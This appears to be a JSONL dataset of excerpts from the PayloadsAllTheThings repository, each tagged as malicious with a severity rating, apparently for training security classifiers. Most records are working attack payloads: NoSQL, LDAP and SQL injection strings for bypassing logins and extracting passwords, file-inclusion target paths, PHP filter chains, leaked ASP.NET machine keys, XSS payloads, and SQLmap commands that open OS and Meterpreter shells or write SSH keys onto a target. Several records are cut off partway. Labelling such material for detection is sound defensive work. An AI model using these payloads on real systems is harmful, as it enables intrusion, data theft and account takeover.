{"id": "payloads_00000", "source": "payloads_all_the_things", "source_license": "MIT", "text": "# NoSQL Injection\n\n> NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.\n\n## Summary\n\n* [Tools](#tools)\n* [Methodology](#methodology)\n * [Operator Injection](#operator-injection)\n * [Authentication Bypass](#authentication-bypass)\n * [Extract Length Information](#extract-length-information)\n * [Extract Data Information](#extract-data-information)\n * [WAF and Filters](#waf-and-filters)\n* [Blind NoSQL](#blind-nosql)\n * [POST with JSON Body](#post-with-json-body)\n * [POST with urlencoded Body](#post-with-urlencoded-body)\n * [GET](#get)\n* [Labs](#references)\n* [References](#references)\n\n## Tools\n\n* [codingo/NoSQLmap](https://github.com/codingo/NoSQLMap) - Automated NoSQL database enumeration and web application exploitation tool\n* [digininja/nosqlilab](https://github.com/digininja/nosqlilab) - A lab for playing with NoSQL Injection\n* [matrix/Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner) - This extension provides a way to discover NoSQL injection vulnerabilities.\n\n## Methodology\n\nNoSQL injection occurs when an attacker manipulates queries by injecting malicious input into a NoSQL database query. Unlike SQL injection, NoSQL injection often exploits JSON-based queries and operators like `$ne`, `$gt`, `$regex`, or `$where` in MongoDB.\n\n### Operator Injection\n\n| Operator | Description |\n| -------- | ------------------ |\n| $ne | not equal |\n| $regex | regular expression |\n| $gt | greater than |\n| $lt | lower than |\n| $nin | not in |\n\nExample: A web application has a product search feature\n\n```js\ndb.products.find({ \"price\": userInput })\n```\n\nAn attacker can inject a NoSQL query: `{ \"$gt\": 0 }`.\n\n```js\ndb.products.find({ \"price\": { \"$gt\": 0 } })\n```\n\nInstead of returning a specific product, the database returns all products with a price greater than zero, leaking data.\n\n### Authentication Bypass\n\nBasic authentication bypass using not equal (`$ne`) or greater (`$gt`)\n\n* HTTP data\n\n ```ps1\n username[$ne]=toto&password[$ne]=toto\n login[$regex]=a.*&pass[$ne]=lol\n login[$gt]=admin&login[$lt]=test&pass[$ne]=1\n login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto\n ```\n\n* JSON data\n\n ```json\n {\"username\": {\"$ne\": null}, \"password\": {\"$ne\": null}}\n {\"username\": {\"$ne\": \"foo\"}, \"password\": {\"$ne\": \"bar\"}}\n {\"username\": {\"$gt\": undefined}, \"password\": {\"$gt\": undefined}}\n {\"username\": {\"$gt\":\"\"}, \"password\": {\"$gt\":\"\"}}\n ```\n\n### Extract Length Information\n\nInject a payload using the $regex operator. The injection will work when the length is correct.\n\n```ps1\nusername[$ne]=toto&password[$regex]=.{1}\nusername[$ne]=toto&password[$regex]=.{3}\n```\n\n### Extract Data Information\n\nExtract data with \"`$regex`\" query operator.\n\n* HTTP data\n\n ```ps1\n username[$ne]=toto&password[$regex]=m.{2}\n username[$ne]=toto&password[$regex]=md.{1}\n username[$ne]=toto&password[$regex]=mdp\n\n username[$ne]=toto&password[$regex]=m.*\n username[$ne]=toto&password[$regex]=md.*\n ```\n\n* JSON data\n\n ```json\n {\"username\": {\"$eq\": \"admin\"}, \"password\": {\"$regex\": \"^m\" }}\n {\"username\": {\"$eq\": \"admin\"}, \"password\": {\"$regex\": \"^md\" }}\n {\"username\": {\"$eq\": \"admin\"}, \"password\": {\"$regex\": \"^mdp\" }}\n ```\n\nExtract data with \"`$in`\" query operator.\n\n```json\n{\"username\":{\"$in\":[\"Admin\", \"4dm1n\", \"admin\", \"root\", \"administrator\"]},\"password\":{\"$gt\":\"\"}}\n```\n\n### WAF and Filters\n\n**Remove pre-condition**:\n\nIn MongoDB, if a document contains duplicate keys, only the last occurrence of the key will take precedence.\n\n```js\n{\"id\":\"10\", \"id\":\"100\"} \n```\n\nIn this case, the final value of \"id\" will be \"100\".\n\n## Blind NoSQL\n\n### POST with JSON Body\n\nPython script:\n\n```python\nimport", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "NoSQL injection payload from NoSQL Injection/README.md. Contains attack vectors, exploitation techniques, or proof-of-concept code that could be used for malicious purposes."}]} {"id": "payloads_00001", "source": "payloads_all_the_things", "source_license": "MIT", "text": "*\n*)(&\n*))%00\n)(cn=))\\x00\n*()|%26'\n*()|&'\n*(|(mail=*))\n*(|(objectclass=*))\n*)(uid=*))(|(uid=*\n*/*\n*|\n/\n//\n//*\n@*\n|\nadmin*\nadmin*)((|userpassword=*)\nadmin*)((|userPassword=*)\nx' or name()='username' or 'x'='ys", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "high", "explanation": "LDAP injection payload from LDAP Injection/LDAP_FUZZ_SMALL.txt. Contains attack vectors, exploitation techniques, or proof-of-concept code that could be used for malicious purposes."}]} {"id": "payloads_00002", "source": "payloads_all_the_things", "source_license": "MIT", "text": "1\n1'\n1\"\n[1]\n1`\n1\\\n1/*'*/\n1/*!1111'*/\n1'||'asd'||'\n1' or '1'='1\n1 or 1=1\n'or''='", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "SQL injection payload from SQL Injection/Generic_Fuzz.txt. Contains attack vectors, exploitation techniques, or proof-of-concept code that could be used for malicious purposes."}]} {"id": "payloads_00003", "source": "payloads_all_the_things", "source_license": "MIT", "text": "F2D27DF0348E9A3EAD6AC66330C31F821394D4CD1A5E139EEE85EA9D9F2A963E55EC87572F699FB834292CC9E37AD56B6B26AA379106CBA5E9AA544C688F3E92,F6D5A5C8DDEC57481610829F58D6C95BDAC5FA21082F3FA9CB5A36DCEAACBEDB\nCB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF,E9D2490BD0075B51D1BA5288514514AF\nEDB59F017A178C9095805B88666496F8A6E24761256AE27F8F8994B07F5D9BBD2499F9560967849067899CE234D8E4769CF0AEE99474FA7A6F67D4E62E7F5650,8FFD993C85C8464EA7C117CA0CDB37572B60ECA8BABAA76C6BC94994CA115ECE\n086BA0EB24E1A622F477B52C19C30A4069A0472CB089F6B80667368450C275CD9F649EC5DB9F8BCCD7B25E286F52852E956B0CD638EAE29E0B6B47F0A8FE6133,00B978835A8B45E0E11422C5F56E626306320DBFFCC6F3121D34AB8D32616E80\nA0FF8AAEEF61C0F962B18DA75FC2FCB2113255870C45C3C695FF2F98652A665DEE2F57A7CA4236F17423EC0D7B6CE0F8BE25323D0FF4BA7DBB3113451709A781,5C66D9C8F48669CF12EA7E69EBEB2C2C2775F37DAFA3AF49\n56AB7132992003EE87F74AE4D9675D65EED8018D3528C0B8874905B51940DEAF6B85F1D922D19AB8F69781B2326A2F978A064708822FD8C54ED74CADF8592E17,A69D80B92A16DFE1698DFE86D4CED630FA56D7C1661C8D05744449889B88E8DC\n87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC,E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92F7\nF1ABAEE7E733A4CE4771C27EA79021D992E47B8801A3618305F9820F468FB193C63A21485DEFD0F51A5D8FD31B5A5BAA968DD456B9F7BC575F8B61A662E8972C,DDABD235C8B46113985005507B476F468D4C283F2C14989F\n0EBBA00DA053E328AB97A4E5C5776BB9B6942A68858824A06F41F426E315AD08692E8D161CC964621C4812D1E661D41DB2E80D714D9665D6B715A10B8269D74D,372312838EDA93BB0F1865733FDC6ACC5A1AFD7F9CBD0604\n3C5D2E795AFEF355E5656AF3A7C0A7167C25A32D174FDD92C375F97924239162A5FDFAA8119F6474E6D1EAB6D41128322719D937EBFA9A360E77D4B11580F5F8,637960D51A1036252D15CBADBA9C1732B8D5DF4AA71F6B9545B560F485333DF0\nC551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45,F6722806843145965513817CEBDECBB1F94808E4A6C0B2F2\n8583A4EC1C9C73F83013BC508FF6D5501DCD628D5740E37C21761056862FBCD96E3E41706073121A1DC329F8FE5A1C2EBC3B3BBFA9A66AF446ABB0DCCC225E04,E852249323C54848DAAC8B4E18939D898B25FFD50887D095\nB710815F55E22A33A906AB623FD4D6C2F7CFA8E318C73E206367E2B7BC551F496E2CEB168EE9EEBABB8856B49203F613610C718A1D55F9324595A8AC7A50960A,A66853D79C1859AB168DA9308EAB82F9FDB7F067A6EEEF8895B4F4939751E2E8\nDB7A67C340F1646C37F5795F16D8F6D022EC524C3FBEF8E685E0A3862EBD6CFC34FFC591BF741DB676BC22C0135301F0C34BC857C75182FD6C38BC271DA7B4C4,159C53F3041BACD4DEC5C552640810921B80DCBF7E2FD9D3\nCD13B657DE510907D7B33AD293720E0D6B20694EFA23DF68C4B1FF115E5D20DC7A0956BA0A173587D702FC9E9EEBAF727CFE23E354075CFA5232EF9603EE64B5,D937C0BA1F75C95CDE3455D3B36AC86406975D1CB3AA7D70F9165D48395E1114\nA1654CEE27B5758FA01A90EDDF26E2094B9093BEA5E991B847B50C332986EDCF01FE35C7DD4286F4E6539B420A13B7EA03C32196639D66818E441998B6693084,29A2C2F8FBA079BC4E2EE5F264BF86F99B2876A38F5D7D34\nF4F0AC3A8889DFBB6FC9D24275A8F0E523C1FB1A2F3FA0C3F3B36320A80670E1D62D15A16A335F0CB14F8AECE7002A5BD8A980F677EA82666B49167947F0A669,87852F941542853BFDE24FE43165ADE6886FA6A0E9C4D4AECDBD4545F8CF579A\n0161DF8B3E1979DD62E41AC1C92BA883A6D67147A1F2769AF96EA592091A11C183706B0C1DD455701A744EDC4DCFD8F3C61BBC3E9BD01B2874AB25228B2D35AE,0BBD542DC6A4D24DD5D0647D356F407318BFD1394D108840\n82FBC4649986565231B8ED91F953861DEF61798A0762444E6FC3BE98ED0BB7BBB2B7F3D969FA966677032D041A0F66A8C005A4E118B755D59963E2561099EA66,068F5046828DFD92F5091915D5FCEBF2BC46F63D4F87E05CEFF52E098C2746EC\nC5274EBD4132CAF41C8B0EEA787BD6BC1ED7D2CEB83E01A767BF75EC1D53B8A4F64DA526E9DA2AF652E07B2CB1B990F845AE38FA19E7CBC0E49EB2E441BCCF68,64A042EED787DD80B896CCFD3F4E70B58DB9E2378BF5D327\n26986EC73B519D253702C0DC129C00A241C9367271385D8855EC6830A4F2AC689DED3AEDF24B92ED02987E1A0008FCA99BFB850F00FE09D572436AA00B38E171,07F36C1C8D463E051E49F8FE29A894ED81BFE34E56C945536AEF9C02A1830EFD\nB40DC9E190CAF773FD68D1B648C9F3D96CDDE929EBCD74A1DF18FB0907EAC3C86170D593D69E26B78E8AF9E88B7BCBFA72D307CCC498D4EDE4F2BA589AB25B26,18A6D3CDEB4A8A36552FA909728CB7F4CC4B43B541D6B293\n01CA3901031C67B0DF02", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscation", "severity": "high", "explanation": "API key leak patterns payload from API Key Leaks/MachineKeys.txt. Contains attack vectors, exploitation techniques, or proof-of-concept code that could be used for malicious purposes."}]} {"id": "payloads_00004", "source": "payloads_all_the_things", "source_license": "MIT", "text": "C:/$recycle.bin/s-1-5-18/desktop.ini\nC:/apache2/log/access.log\nC:/apache2/log/access_log\nC:/apache2/log/error.log\nC:/apache2/log/error_log\nC:/apache2/logs/access.log\nC:/apache2/logs/access_log\nC:/apache2/logs/error.log\nC:/apache2/logs/error_log\nC:/apache/log/access.log\nC:/apache/log/access_log\nC:/apache/log/error.log\nC:/apache/log/error_log\nC:/apache/logs/access.log\nC:/apache/logs/access_log\nC:\\apache\\logs\\access.log\nC:/apache/logs/error.log\nC:/apache/logs/error_log\nC:\\apache\\logs\\error.log\nC:/apache/php/php.ini\nC:/boot.ini\nC:\\boot.ini\nC:/documents and settings/administrator/desktop/desktop.ini\nC:/documents and settings/administrator/ntuser.dat\nC:/documents and settings/administrator/ntuser.ini\nC:/home2/bin/stable/apache/php.ini\nC:/home/bin/stable/apache/php.ini\nC:/inetpub/logs/logfiles\nC:/inetpub/wwwroot/global.asa\nC:/inetpub/wwwroot/index.asp\nC:/inetpub/wwwroot/web.config\nC:/log/access.log\nC:/log/access_log\nC:/log/error.log\nC:/log/error_log\nC:/log/httpd/access_log\nC:/log/httpd/error_log\nC:/logs/access.log\nC:/logs/access_log\nC:/logs/error.log\nC:/logs/error_log\nC:/logs/httpd/access_log\nC:/logs/httpd/error_log\nC:/MININT/SMSOSD/OSDLOGS/VARIABLES.DAT\nC:/mysql/bin/my.ini\nC:/mysql/data/hostname.err\nC:/mysql/data/mysql.err\nC:/mysql/data/mysql.log\nC:/mysql/my.cnf\nC:/mysql/my.ini\nC:\\nginx-1.7.4\\conf\\nginx.conf\nC:\\nginx-1.7.4\\nginx.conf\nC:/opt/xampp/logs/access.log\nC:/opt/xampp/logs/access_log\nC:/opt/xampp/logs/error.log\nC:/opt/xampp/logs/error_log\nC:/php4/php.ini\nC:/php4/sessions/\nC:/php5/php.ini\nC:/php5/sessions/\nC:/php/php.ini\nC:/php/sessions/\nC:/program files/apache group/apache2/conf/httpd.conf\nC:/program files/apachegroup/apache2/conf/httpd.conf\nC:/programfiles/apachegroup/apache2/conf/httpd.conf\nC:/program files/apache group/apache/conf/httpd.conf\nC:/program files/apachegroup/apache/conf/httpd.conf\nC:/programfiles/apachegroup/apache/conf/httpd.conf\nC:/program files/apache group/apache/logs/access.log\nC:/program files/apache group/apache/logs/error.log\nC:\\Program Files\\Apache Software Foundation\\Apache2.2\\conf\\httpd.conf\nC:\\Program Files\\Apache Software Foundation\\Apache2.2\\logs\\access.log\nC:\\Program Files\\Apache Software Foundation\\Apache2.2\\logs\\error.log\nC:/program files/filezilla server/filezilla server.xml\nC:/program files/mysql/data/hostname.err\nC:/program files/mysql/data/mysql-bin.log\nC:/program files/mysql/data/mysql.err\nC:/program files/mysql/data/mysql.log\nC:/program files/mysql/my.cnf\nC:/program files/mysql/my.ini\nC:/program files/mysql/mysql server 5.0/data/hostname.err\nC:/program files/mysql/mysql server 5.0/data/mysql-bin.log\nC:/program files/mysql/mysql server 5.0/data/mysql.err\nC:/program files/mysql/mysql server 5.0/data/mysql.log\nC:/program files/mysql/mysql server 5.0/my.cnf\nC:/program files/mysql/mysql server 5.0/my.ini\nC:/program files/mysql/mysql server 5.1/my.ini\nC:/program files (x86)/apache group/apache2/conf/httpd.conf\nC:/program files (x86)/apache group/apache/conf/access.log\nC:/program files (x86)/apache group/apache/conf/error.log\nC:/program files (x86)/apache group/apache/conf/httpd.conf\nC:/program files (x86)/filezilla server/filezilla server.xml\nC:/program files (x86)/xampp/apache/conf/httpd.conf\nC:/program files/xampp/apache/conf/httpd.conf\nC:/programfiles/xampp/apache/conf/httpd.conf\nC:/program files/xampp/apache/conf/httpd.confetc/passwd\nC:/sysprep.inf\nC:/sysprep/sysprep.inf\nC:/sysprep/sysprep.xml\nC:/sysprep.xml\nC:/system32/inetsrv/metabase.xml\nC:/system volume information/wpsettings.dat\nC:/unattended.txt\nC:/unattended.xml\nC:/unattend.txt\nC:/unattend.xml\nC:/users/administrator/desktop/desktop.ini\nC:/users/administrator/ntuser.dat\nC:/users/administrator/ntuser.ini\nC:\\wamp\\apache2\\logs\\access.log\nC:\\wamp\\apache2\\logs\\access_log\nC:\\wamp\\apache2\\logs\\error.log\nC:\\wamp\\apache2\\logs\\error_log\nC:\\wamp\\logs\\access.log\nC:\\wamp\\logs\\access_log\nC:\\wamp\\logs\\error.log\nC:\\wamp\\logs\\error_log\nC:/windows/csc/v2.0.6/pq\nC:/windows/csc/v2.0.6/sm\nC:/windows/debug/netsetup.log\nC:/windows/explorer.exe\nC:/windows/ii", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "File inclusion payload from File Inclusion/Windows-files.txt. Contains attack vectors, exploitation techniques, or proof-of-concept code that could be used for malicious purposes."}]} {"id": "payloads_00005", "source": "payloads_all_the_things", "source_license": "MIT", "text": "/usr/pkg/etc/httpd/httpd.conf\n/usr/local/etc/apache22/httpd.conf\n/usr/local/etc/apache2/httpd.conf\n/var/www/conf/httpd.conf\n/var/www/logs/error_log\n/var/www/logs/access_log\n/etc/apache2/httpd2.conf\n/var/apache2/logs/error_log\n/var/apache2/logs/access_log\n/var/log/httpd-error.log\n/var/log/httpd-access.log\n/var/log/httpd/error_log\n/var/log/httpd/access_log", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "File inclusion payload from File Inclusion/BSD-files.txt. Contains attack vectors, exploitation techniques, or proof-of-concept code that could be used for malicious purposes."}]} {"id": "payloads_00006", "source": "payloads_all_the_things", "source_license": "MIT", "text": "convert.iconv.437.CP930\nconvert.iconv.CP1390.CSIBM932\nconvert.iconv.CP273.CP1122\nconvert.iconv.CP285.CP280\nconvert.iconv.CSISO5427CYRILLIC.855\nconvert.iconv.CSN_369103.CP770\nconvert.iconv.CSUNICODE.CSUNICODE\nconvert.iconv.CSUNICODE.UCS-2BE\nconvert.iconv.ES.IBM037\nconvert.iconv.ES.IBM930\nconvert.iconv.IBM037.CP1250\nconvert.iconv.IBM037.IBM256\nconvert.iconv.IBM037.IBM280\nconvert.iconv.IBM037.IBM860\nconvert.iconv.IBM1122.IBM273\nconvert.iconv.IBM1137.8859_1\nconvert.iconv.IBM1141.8859_1\nconvert.iconv.IBM1141.IBM4517\nconvert.iconv.IBM1145.IBM850\nconvert.iconv.IBM1148.EBCDIC-AT-DE-A\nconvert.iconv.IBM1149.MAC-SAMI\nconvert.iconv.IBM1390.IBM932\nconvert.iconv.IBM1390.IBM939\nconvert.iconv.IBM1399.IBM930\nconvert.iconv.IBM256.IBM273\nconvert.iconv.IBM273.CWI\nconvert.iconv.IBM273.ES\nconvert.iconv.IBM273.IBM420\nconvert.iconv.IBM273.IT\nconvert.iconv.IBM273.PT\nconvert.iconv.IBM273.US\nconvert.iconv.IBM277.ISO-8859-9E\nconvert.iconv.IBM278.IBM861\nconvert.iconv.IBM278.MIK\nconvert.iconv.IBM284.IBM278\nconvert.iconv.IBM297.IBM273\nconvert.iconv.IBM297.IBM280\nconvert.iconv.IBM4971.ARMSCII-8\nconvert.iconv.IBM870.MAC-IS\nconvert.iconv.L1.UCS-4\nconvert.iconv.L1.UCS-4LE\nconvert.iconv.L1.UTF16LE\nconvert.iconv.L1.utf7\nconvert.iconv.L1.UTF7\nconvert.iconv.UCS-4LE.10646-1:1993\nconvert.iconv.UTF16.UTF16\nconvert.iconv..UTF7\nconvert.iconv.UTF8.CP930\nconvert.iconv.UTF8.IBM1140\nconvert.iconv.VISCII.MSZ_7795.3", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "File inclusion payload from File Inclusion/php-filter-iconv.txt. Contains attack vectors, exploitation techniques, or proof-of-concept code that could be used for malicious purposes."}]} {"id": "payloads_00007", "source": "payloads_all_the_things", "source_license": "MIT", "text": "\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Malicious file upload payload from Upload Insecure Files/phpinfo.php. Contains attack vectors, exploitation techniques, or proof-of-concept code that could be used for malicious purposes."}]} {"id": "payloads_00008", "source": "payloads_all_the_things", "source_license": "MIT", "text": "# SQLmap\n\n> SQLmap is a powerful tool that automates the detection and exploitation of SQL injection vulnerabilities, saving time and effort compared to manual testing. It supports a wide range of databases and injection techniques, making it versatile and effective in various scenarios.\n> Additionally, SQLmap can retrieve data, manipulate databases, and even execute commands, providing a robust set of features for penetration testers and security analysts.\n> Reinventing the wheel isn't ideal because SQLmap has been rigorously developed, tested, and improved by experts. Using a reliable, community-supported tool means you benefit from established best practices and avoid the high risk of missing vulnerabilities or introducing errors in custom code.\n> However you should always know how SQLmap is working, and be able to replicate it manually if necessary.\n\n## Summary\n\n* [Basic Arguments For SQLmap](#basic-arguments-for-sqlmap)\n* [Load A Request File](#load-a-request-file)\n* [Custom Injection Point](#custom-injection-point)\n* [Second Order Injection](#second-order-injection)\n* [Getting A Shell](#getting-a-shell)\n* [Crawl And Auto-Exploit](#crawl-and-auto-exploit)\n* [Proxy Configuration For SQLmap](#proxy-configuration-for-sqlmap)\n* [Injection Tampering](#injection-tampering)\n * [Suffix And Prefix](#suffix-and-prefix)\n * [Default Tamper Scripts](#default-tamper-scripts)\n * [Custom Tamper Scripts](#custom-tamper-scripts)\n * [Custom SQL Payload](#custom-sql-payload)\n * [Evaluate Python Code](#evaluate-python-code)\n * [Preprocess And Postprocess Scripts](#preprocess-and-postprocess-scripts)\n* [Reduce Requests Number](#reduce-requests-number)\n* [SQLmap Without SQL Injection](#sqlmap-without-sql-injection)\n* [References](#references)\n\n## Basic Arguments For SQLmap\n\n```powershell\nsqlmap --url=\"\" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs\n```\n\n## Load A Request File\n\nA request file in SQLmap is a saved HTTP request that SQLmap reads and uses to perform SQL injection testing. This file allows you to provide a complete and custom HTTP request, which SQLmap can use to target more complex applications.\n\n```powershell\nsqlmap -r request.txt\n```\n\n## Custom Injection Point\n\nA custom injection point in SQLmap allows you to specify exactly where and how SQLmap should attempt to inject payloads into a request. This is useful when dealing with more complex or non-standard injection scenarios that SQLmap may not detect automatically.\n\nBy defining a custom injection point with the wildcard character '`*`' , you have finer control over the testing process, ensuring SQLmap targets specific parts of the request you suspect to be vulnerable.\n\n```powershell\nsqlmap -u \"http://example.com\" --data \"username=admin&password=pass\" --headers=\"x-forwarded-for:127.0.0.1*\"\n```\n\n## Second Order Injection\n\nA second-order SQL injection occurs when malicious SQL code injected into an application is not executed immediately but is instead stored in the database and later used in another SQL query.\n\n```powershell\nsqlmap -r /tmp/r.txt --dbms MySQL --second-order \"http://targetapp/wishlist\" -v 3\nsqlmap -r 1.txt -dbms MySQL -second-order \"http:///joomla/administrator/index.php\" -D \"joomla\" -dbs\n```\n\n## Getting A Shell\n\n* SQL Shell:\n\n ```ps1\n sqlmap -u \"http://example.com/?id=1\" -p id --sql-shell\n ```\n\n* OS Shell:\n\n ```ps1\n sqlmap -u \"http://example.com/?id=1\" -p id --os-shell\n ```\n\n* Meterpreter:\n\n ```ps1\n sqlmap -u \"http://example.com/?id=1\" -p id --os-pwn\n ```\n\n* SSH Shell:\n\n ```ps1\n sqlmap -u \"http://example.com/?id=1\" -p id --file-write=/root/.ssh/id_rsa.pub --file-destination=/home/user/.ssh/\n ```\n\n## Crawl And Auto-Exploit\n\nThis method is not advisable for penetration testing; it should only be used in controlled environments or challenges. It will crawl the entire website ", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "SQL injection payload from SQL Injection/SQLmap.md. Contains attack vectors, exploitation techniques, or proof-of-concept code that could be used for malicious purposes."}]} {"id": "payloads_00009", "source": "payloads_all_the_things", "source_license": "MIT", "text": "javascript:alert(1);\njavascript:alert(1);\njavascript:alert(1);\njavascript:alert(1);\njavascript:alert(1);\njavascript:alert(1);\njavascript:alert(1);\n'`\"><\\x3Cscript>javascript:alert(1) \n'`\"><\\x00script>javascript:alert(1)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nalert('XSS')\n\"onmouseover%3dprompt(941634) \n%f6%22%20onmouseover%3dprompt(941634)%20\n\" onerror=alert()1 a=\"\nstyle=xss:expression(alert(1))\n\n\n\n\n\">\n\n\n\n\n\n\n\n\n\n\n\n\n<\n\n\\\";alert('XSS');//\n\n\n\n\n\n\n\n
\n\n\n\n\n; REL=stylesheet\">\n\n\n